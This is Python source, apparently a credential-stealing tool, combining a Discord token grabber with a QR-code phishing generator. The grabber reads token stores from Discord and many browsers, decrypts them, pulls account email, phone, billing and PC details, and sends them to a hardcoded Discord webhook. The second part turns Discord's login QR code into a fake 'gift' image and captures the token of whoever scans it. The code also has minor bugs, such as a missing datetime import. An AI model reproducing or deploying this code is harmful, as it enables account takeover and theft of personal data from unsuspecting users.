from bs4 import BeautifulSoup from selenium import webdriver from PIL import Image import base64 import time import requests, json, os from base64 import b64decode from Crypto.Cipher import AES from win32crypt import CryptUnprotectData from os import getlogin, listdir from json import loads from re import findall from urllib.request import Request, urlopen from subprocess import Popen, PIPE # Developer: NightfallGT # Educational purposes only tokens = [] cleaned = [] checker = [] def decrypt(buff, master_key): try: return AES.new(CryptUnprotectData(master_key, None, None, None, 0)[1], AES.MODE_GCM, buff[3:15]).decrypt(buff[15:])[:-16].decode() except: return "Error" def getip(): ip = "None" try: ip = urlopen(Request("https://api.ipify.org")).read().decode().strip() except: pass return ip def gethwid(): p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE) return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1] def get_token(): already_check = [] checker = [] local = os.getenv('LOCALAPPDATA') roaming = os.getenv('APPDATA') chrome = local + "\\Google\\Chrome\\User Data" paths = { 'Discord': roaming + '\\discord', 'Discord Canary': roaming + '\\discordcanary', 'Lightcord': roaming + '\\Lightcord', 'Discord PTB': roaming + '\\discordptb', 'Opera': roaming + '\\Opera Software\\Opera Stable', 'Opera GX': roaming + '\\Opera Software\\Opera GX Stable', 'Amigo': local + '\\Amigo\\User Data', 'Torch': local + '\\Torch\\User Data', 'Kometa': local + '\\Kometa\\User Data', 'Orbitum': local + '\\Orbitum\\User Data', 'CentBrowser': local + '\\CentBrowser\\User Data', '7Star': local + '\\7Star\\7Star\\User Data', 'Sputnik': local + '\\Sputnik\\Sputnik\\User Data', 'Vivaldi': local + '\\Vivaldi\\User Data\\Default', 'Chrome SxS': local + '\\Google\\Chrome SxS\\User Data', 'Chrome': chrome + 'Default', 'Epic Privacy Browser': local + '\\Epic Privacy Browser\\User Data', 'Microsoft Edge': local + '\\Microsoft\\Edge\\User Data\\Defaul', 'Uran': local + '\\uCozMedia\\Uran\\User Data\\Default', 'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default', 'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default', 'Iridium': local + '\\Iridium\\User Data\\Default' } for platform, path in paths.items(): if not os.path.exists(path): continue try: with open(path + f"\\Local State", "r") as file: key = loads(file.read())['os_crypt']['encrypted_key'] file.close() except: continue for file in listdir(path + f"\\Local Storage\\leveldb\\"): if not file.endswith(".ldb") and file.endswith(".log"): continue else: try: with open(path + f"\\Local Storage\\leveldb\\{file}", "r", errors='ignore') as files: for x in files.readlines(): x.strip() for values in findall(r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*", x): tokens.append(values) except PermissionError: continue for i in tokens: if i.endswith("\\"): i.replace("\\", "") elif i not in cleaned: cleaned.append(i) for token in cleaned: try: tok = decrypt(b64decode(token.split('dQw4w9WgXcQ:')[1]), b64decode(key)[5:]) except IndexError == "Error": continue checker.append(tok) for value in checker: if value not in already_check: already_check.append(value) headers = {'Authorization': tok, 'Content-Type': 'application/json'} try: res = requests.get('https://discordapp.com/api/v6/users/@me', headers=headers) except: continue if res.status_code == 200: res_json = res.json() ip = getip() pc_username = os.getenv("UserName") pc_name = os.getenv("COMPUTERNAME") user_name = f'{res_json["username"]}#{res_json["discriminator"]}' user_id = res_json['id'] email = res_json['email'] phone = res_json['phone'] mfa_enabled = res_json['mfa_enabled'] has_nitro = False res = requests.get('https://discordapp.com/api/v6/users/@me/billing/subscriptions', headers=headers) nitro_data = res.json() has_nitro = bool(len(nitro_data) > 0) days_left = 0 if has_nitro: d1 = datetime.strptime(nitro_data[0]["current_period_end"].split('.')[0], "%Y-%m-%dT%H:%M:%S") d2 = datetime.strptime(nitro_data[0]["current_period_start"].split('.')[0], "%Y-%m-%dT%H:%M:%S") days_left = abs((d2 - d1).days) embed = f"""> **{user_name}** | *({user_id})* > :gear: __Account Information:__ Email: `{email}` Phone: `{phone}` 2FA/MFA Enabled: `{mfa_enabled}` Nitro: `{has_nitro}` Expires in: `{days_left if days_left else "None"} day(s)` > :computer: __PC Information:__ IP: `{ip}` Username: `{pc_username}` PC Name: `{pc_name}` Platform: `{platform}` > :warning: __Token:__ `{tok}` `{pc_username} Has Ran GANG-Nuker Token Grabber!` :smiling_imp:""" payload = json.dumps({'content': embed, 'username': 'GANG GRABBER', 'avatar_url': 'https://media.discordapp.net/attachments/878154522978029582/917679300705124412/a4235fd1da45633adbc305450741b506.png'}) try: headers2 = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11' } req = Request('https://discord.com/api/webhooks/981890982431821884/6lceRdTsRmYNBKM5c5Qp39k69rBJ0WJ5tA8opJFfthekRsT68RQXicdwJgrb_MI0ACCj', data=payload.encode(), headers=headers2) urlopen(req) except: continue else: continue if __name__ == '__main__': get_token() def logo_qr(): im1 = Image.open('temp/qr_code.png', 'r') im2 = Image.open('temp/overlay.png', 'r') im2_w, im2_h = im2.size im1.paste(im2, (60, 55)) im1.save('temp/final_qr.png', quality=95) def paste_template(): im1 = Image.open('temp/template.png', 'r') im2 = Image.open('temp/final_qr.png', 'r') im1.paste(im2, (120, 409)) im1.save('discord_gift.png', quality=95) def main(): print('github.com/NightfallGT/Discord-QR-Scam\n') print('** QR Code Scam Generator **') options = webdriver.ChromeOptions() options.add_experimental_option('excludeSwitches', ['enable-logging']) options.add_experimental_option('detach', True) driver = webdriver.Chrome(options=options, executable_path=r'chromedriver.exe') driver.get('https://discord.com/login') time.sleep(5) print('- Page loaded.') page_source = driver.page_source soup = BeautifulSoup(page_source, features='lxml') div = soup.find('div', {'class': 'qrCode-wG6ZgU'}) qr_code = div.find('img')['src'] file = os.path.join(os.getcwd(), 'temp/qr_code.png') img_data = base64.b64decode(qr_code.replace('data:image/png;base64,', '')) with open(file,'wb') as handler: handler.write(img_data) discord_login = driver.current_url logo_qr() paste_template() print('- QR Code has been generated. > discord_gift.png') print('Send the QR Code to user and scan. Waiting..') while True: if discord_login != driver.current_url: print('Grabbing token..') token = driver.execute_script(''' var req = webpackJsonp.push([ [], { extra_id: (e, t, r) => e.exports = r }, [ ["extra_id"] ] ]); for (let e in req.c) if (req.c.hasOwnProperty(e)) { let t = req.c[e].exports; if (t && t.__esModule && t.default) for (let e in t.default) "getToken" === e && (token = t.default.getToken()) } return token; ''') print('---') print('Token grabbed:',token) break print('Task complete.') if __name__ == '__main__': main()